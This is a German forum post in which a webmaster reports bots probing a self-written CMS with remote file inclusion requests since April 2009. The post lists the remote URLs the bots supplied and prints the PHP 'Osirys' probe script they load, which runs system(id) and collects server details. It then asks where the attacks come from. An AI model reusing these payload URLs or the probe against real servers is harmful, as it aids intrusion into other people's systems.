Auf einen meiner Server läuft ein von mir geschriebenes CMS, dass ein Verlaufsprotokoll besitzt und demzufolge alles mitprotokolliert.
Nun ist es so, dass einer dieser Server seit dem 24.04.09 ständig von irgendwelchen Bots (gehe ich von aus) angegegriffen wird.
Vielleicht weiß ja einer von euch, was sich hinter diesen URLS verbirgt:
http://www.cdl-df.com.br/liquida/fotos/id.txt
http://memphisbeersandwines.com/idv6.txt
http://www.laurent-camping-cars.com//administrator/components/drivid.txt
http://ecology45.t35.com/idv6.txt
http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt
http://80.24.176.145/time//appserv/file.txt
http://74.208.173.138:4443/index.html
http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fnuqa%2F
http://www.clubnataciotortosa.com/UserFiles/Media/ulagoh/opika/
http://schoolpapers.hostinginfive.com/bike.htm
http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt
http://ats-usa.net//styles/i/id.txt
http://www.stahuj-foto.eu//foto/nahledy/Tomy25-d3c396eabbf0e1c59e2ee3dcc/id.txt
[edit]
http://144.206.186.112:2666/index.html
Das ist der Inhalt der meisten Textdateien:
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len = 4 && $len = 7 && $len <=9) {
return sprintf(„%0.2f Mb“, $number/1024/1024);
}
return sprintf(„%0.2f Gb“, $number/1024/1024/1024);
}
echo „Osirys“;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {
$free = 0;
}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {
$all = 0;
}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo „0sirys was here ..“;
echo „uname -a: $un“;
echo „os: $os“;
echo „id: $id1″;
echo „free: $free“;
echo „used: $used“;
echo „total: $all“;
exit;
?>
Das Script ist eigentlich total harmlos, jedoch das „exit“ ist ein Problem. Wenn ein Angreifer es, wie auch immer, schaffen sollte, diese Datei auf dem Server schreiben zu können, dann stoppt das exit meine Webseite.
Hier ein Auszug aus meiner Verlaufsübersicht:

Angriff aus dem Netz
Weiß einer, woher dieser Kram kommt????
[edit]
Ich habe gerade in einem Forum von folgendem Begriff gelesen: PHP remote upload exploit